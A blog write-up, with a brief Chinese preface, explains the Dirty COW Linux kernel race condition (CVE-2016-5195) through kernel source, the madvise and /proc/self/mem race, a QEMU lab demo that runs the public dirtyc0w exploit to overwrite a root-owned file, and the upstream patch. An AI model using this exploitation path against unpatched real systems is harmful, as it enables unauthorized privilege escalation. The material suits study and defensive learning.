Cve 2016 5195 Dirty Cow
注
脏牛应该是最棒的竞争漏洞。虽然看内核有过一阵子了,至今没有提起勇气去看 page cache 这些底层的内容。希望时时提醒自己,这些代码也藏着危险的漏洞.
原文
This time we can take a look at a very very very famous bug: Dirty-COW vulnerability.
Abstract
CVE-2016-5195, also named Dirty-COW is an infamous race condition bug revealed in the Linux kernel.
After finish googling, I found this blog,done by chao-tic, ranked the first place in elaborating the entire detail. It’s recommended that you watch the video presented by liveoverflow first, then you can read this post before you dive into chao-tic’s one.
If you are interested in its inside or want to exploit it, this post shall be helpful :P.
This post will take Linux-4.4.0 kernel for example, other versions may have differences.
Understand The Bug
The most practical way to understand the bug is to learn how the exploit works. Before doing that, we need to review some kernel-related knowledge.
Copy On Write (COW)
Copy on write is an optimization skills that adopted in Linux memory mangement. For example, when kernel requires free memory pages, the MMU just adjusts some metadata (vm_area_struct, for instance), the real page is not allocated until a page fault is triggered.
In addition, shared resource management, database, etc also count on this skill.
/proc/self/mem
People know about /proc
filesystem, while /proc/self/mem
is a relatively uncommon one. In generel, /proc/pid/mem
is a binary image representing the process’s virtual memory[^4]. One concise answer I preferred is in stack exchange
/proc/$pid/mem shows the contents of $pid’s memory mapped the same way as in the process, i.e., the byte at offset x in the pseudo-file is the same as the byte at address x in the process.
Generally, we won’t be bothered by this /proc/$$/mem
stuff, ptrace
or other debugger stuff will wrap that for us. The precise related operations is defined at proc_mem_operations
in Linux kernel.
static const struct file_operations proc_mem_operations = {
.llseek = mem_lseek,
.read = mem_read,
.write = mem_write,
.open = mem_open,
.release = mem_release,
};
Okay, before dig into the internal of writing to proc/self/mem
, here is another important component of this vulnerability : madvise syscall.
madvise
Be sure that your kernel compiled with CONFIG_ADVISE_SYSCALLS
There is an abstract extracted from the system call manual
The madvise() system call is used to give advice or directions to the kernel about the address range beginning at address addr and with size length bytes. Initially, the system call supported a set of “conventional” advice values, which are also available on several other implementations. (Note, though, that madvise() is not specified in POSIX.) Subsequently, a number of Linux-specific advice values have been added.
Hmm, advice from user sounds quite dangerous.
MADV_DONTNEED: Do not expect access in the near future. (For the time being, the application is finished with the given range, so the kernel can free resources associated with it
So far so good, the user who possesses the resources can advise kernel that he won’t use that resource recently. Thus kernel can do something about that to optimize resource management.
Let’s look into the comments in the source code. (mm/madvise.c)
/*
* Application no longer needs these pages. If the pages are dirty,
* it's OK to just throw them away. The app will be more careful about
* data it wants to keep. Be sure to free swap resources too. The
* zap_page_range call sets things up for shrink_active_list to actually free
* these pages later if no one else has touched them in the meantime,
* although we could add these pages to a global reuse list for
* shrink_active_list to pick up before reclaiming other pages.
*
* NB: This interface discards data rather than pushes it out to swap,
* as some implementations do. This has performance implications for
* applications like large transactional databases which want to discard
* pages in anonymous maps after committing to backing store the data
* that was kept in them. There is no reason to write this data out to
* the swap area if the application is discarding it.
*
* An interface that causes the system to free clean pages and flush
* dirty pages is already available as msync(MS_INVALIDATE).
*/
static long madvise_dontneed(struct vm_area_struct *vma,
struct vm_area_struct **prev,
unsigned long start, unsigned long end)
{...}
In conclusion, if the pages advised by owner with MADV_DONTNEED flag are dirty, the kernel will just throw them away. You can check this blog if you are not familiar with Dirty Page.
Cool, let’s combine what we have in hand.
Racing
With the help of dynamic debugging, we found the writing to /proc/self/mem
leads to __get_user_pages()
function, which defined in mm/gup.c.
mem_write() => mem_rw() => access_remote_vm() => __access_remote_vm() => get_user_pages() => get_user_pages_locked() => __get_user_pages()
Let’s have a glance at this function.
// mm/gup.c __get_user_pages()
long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *nonblocking)
{
/* ...skip... */
do {
struct page *page;
/* ...skip... */
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();
page = follow_page_mask(vma, start, foll_flags, &page_mask);
if (!page) {
int ret;
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking);
switch (ret) {
case 0:
goto retry;
case -EFAULT:
case -ENOMEM:
case -EHWPOISON:
return i ? i : ret;
case -EBUSY:
return i;
case -ENOENT:
goto next_page;
}
BUG();
} else if (PTR_ERR(page) == -EEXIST) {
/*
* Proper page table entry exists, but no corresponding
* struct page.
*/
goto next_page;
} else if (IS_ERR(page)) {
return i ? i : PTR_ERR(page);
}
if (pages) {
pages[i] = page;
flush_anon_page(vma, page, start);
flush_dcache_page(page);
page_mask = 0;
}
/* ...skip... */
} while (nr_pages);
/* ...skip... */
}
The page is returned from follow_page_mask()
function, whose comments is listed below. This function walks the page table structure to find the page descriptor.
follow_page_mask - look up a page descriptor from a user-virtual address
Supposing we are writing to a read-only region, follow_page_mask()
function comes into that part
if ((flags & FOLL_WRITE) && !pte_write(pte)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}
That is to say, a NULL
pointer is returned. Then __get_user_pages()
will call faultin_page
. The follow-up process is kinda complex so we ignore it and focus on the trace supplied by the CVE details.
faultin_page
handle_mm_fault
__handle_mm_fault
handle_pte_fault
FAULT_FLAG_WRITE && !pte_write
do_wp_page
PageAnon() <- this is CoWed page already
reuse_swap_page <- page is exclusively ours
wp_page_reuse
maybe_mkwrite <- dirty but RO again
ret = VM_FAULT_WRITE
In brief, writing to the read-only area causes the faultin_page()
function to create COW pages with dirty marking. So the writing operations won’t affect the original content.
Question? Why not just throw error when write to read-only page??? Is that debugger support?
When the faultin_page()
function finish its job, it will remove the flag FOLL_WRITE
in foll_flags
to avoid another call of faultin_page()
after go retry
in __get_user_pages()
. That is to say, with FOLL_WRITE
removed, the new follow_page_mask()
will return the created COW page instead of NULL
pointer.
// mm/gup.c faultin_page()
/*
* The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
* necessary, even if maybe_mkwrite decided not to set pte_write. We
* can thus safely do subsequent page lookups as if they were reads.
* But only do so when looping for pte_write is futile: in some cases
* userspace may also be wanting to write to the gotten user page,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;
Without
FOLL_WRITE
flag, seemsfollow_page_mask()
will go deeper and callvm_normal_page()
function to obtain the new allocated copy page.
Well, we knew that there are tons of goto
in kernel souce code. This flag remove thing is pretty Linux, but also dangerous. Image the following scenario, a thread keep writing to a read-only mem
while another thread keep madvise to abandon it. The expected sequence is like below.
write(f, str, strlen(str)) |
|| |
\/ |
__get_user_pages(...) |
|| |
\/ |
follow_page_mask(...) |
[return NULL] |
|| |
\/ |
faultin_page(...) |
[create dirty cow] |
[eliminate FOLL_WRITE] |
|| |
\/ |
follow_page_mask(...) |
[return COWed page] |
| madvise(map,100,MADV_DONTNEED)
| ||
| \/
| zap_page_range(...)
| [Drop the Drity COWed page]
However, without the protection of spinlock stuffs, the hacker can race this and leads to below sequence.
write(f, str, strlen(str)) |
|| |
\/ |
__get_user_pages(...) |
|| |
\/ |
follow_page_mask(...) |
[return NULL] |
|| |
\/ |
faultin_page(...) |
[create dirty cow] |
[eliminate FOLL_WRITE] |
|
| madvise(map,100,MADV_DONTNEED)
| ||
| \/
| zap_page_range(...)
| [Drop the Drity COWed page]
|
|
follow_page_mask(...) |
[get the real pagecache!] |
That is because the re-entry of function follow_page_mask()
just check (flags & FOLL_WRITE) && !pte_write(pte)
to decide whether or not continue to obtain the page. The FOLL_WRITE
has been removed so it will return the real page!
Exploit The Bug
There are many scripts supplied in the offical website that you can use to hijack a vulnerable machine. Here we pick the classical one. To emulate an OS, we can use qemu (virtual machine is also doable). In addition, you can use buildroot to quickly setup a qemu+Linux+buildroot environment.
Busybox prepare
Here we try an arm architecture. This blog will help you setup everything you need. like cross-compile toolchain, initramfs….
Booting Linux
I just show the scripts here, make sure you have everything settle down.
$ wget -c https://github.com/torvalds/linux/archive/v4.4.tar.gz
$ tar xvf v4.4.tar.gz
$ cd linux-4.4
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabi- vexpress_defconfig
$ make ARCH=arm CROSS_COMPILE=arm-linux-gnueabi- all -j4
After you get the zImage, and you can start cross-compile the dirtc0w exploit and remember to put it into your initramfs.
$ CROSS_COMPILE=arm-linux-gnueabi-gcc dirtyc0w.c -o dirtyc0w
$ cp dirtyc0w {YOU_INITRAMFS_DIRECTORY} && cd {YOU_INITRAMFS_DIRECTORY}
$ find . | cpio -H newc -o > {TARGET_INITRAMFS_PATH}
Okay, we then use qemu to start booting.
qemu-system-arm -M vexpress -dtb linux-4.4/arch/arm/boot/dts/vexpress-v2p-ca9.dtb -kernel {ZIMAGE PATH} -initrd {TARGET_INITRAMFS_PATH} -nographic -append "earlyprintk=serial,ttyS0 console=ttyAMA0"
After you hanve a Linux shell, just create a file that can only written by root and then su
to your hacker use.
$ echo 'aaaaa' > foo
$ chmod 744 foo
$ su hacker
$ echo 'bbb' > foo
sh: can't create foo: Permission denied
$ cat foo
aaaaa
$ ./dirtyc0w foo bbb
.....
^C
$ cat foo
bbbaa
Boom! We write to that file with our own payloads.
Patching
The patching of this CVE is rather simple.
diff --git a/include/linux/mm.h b/include/linux/mm.h
index e9caec6..ed85879 100644
--- a/include/linux/mm.h
+++ b/include/linux/mm.h
@@ -2232,6 +2232,7 @@ static inline struct page *follow_page(struct vm_area_struct *vma,
#define FOLL_TRIED 0x800 /* a retry, previous pass started an IO */
#define FOLL_MLOCK 0x1000 /* lock present pages */
#define FOLL_REMOTE 0x2000 /* we are working on non-current tsk/mm */
+#define FOLL_COW 0x4000 /* internal GUP flag */
typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
void *data);
diff --git a/mm/gup.c b/mm/gup.c
index 96b2b2f..22cc22e 100644
--- a/mm/gup.c
+++ b/mm/gup.c
@@ -60,6 +60,16 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
return -EEXIST;
}
+/*
+ * FOLL_FORCE can write to even unwritable pte's, but only
+ * after we've gone through a COW cycle and they are dirty.
+ */
+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
+{
+ return pte_write(pte) ||
+ ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
+}
+
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags)
{
@@ -95,7 +105,7 @@ retry:
}
if ((flags & FOLL_NUMA) && pte_protnone(pte))
goto no_page;
- if ((flags & FOLL_WRITE) && !pte_write(pte)) {
+ if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}
@@ -412,7 +422,7 @@ static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
- *flags &= ~FOLL_WRITE;
+ *flags |= FOLL_COW;
return 0;
}
The key idea of this patch is no longer remove FOLL_WRITE
flag when faultin_page()
function finished. It use an new flag FOLL_COW
to do that. We can find the check in follow_page_pte()
function now checks can_follow_write_pte()
, which shall return True
if a COW page is created. (But False
when this page is dropped by madvise
).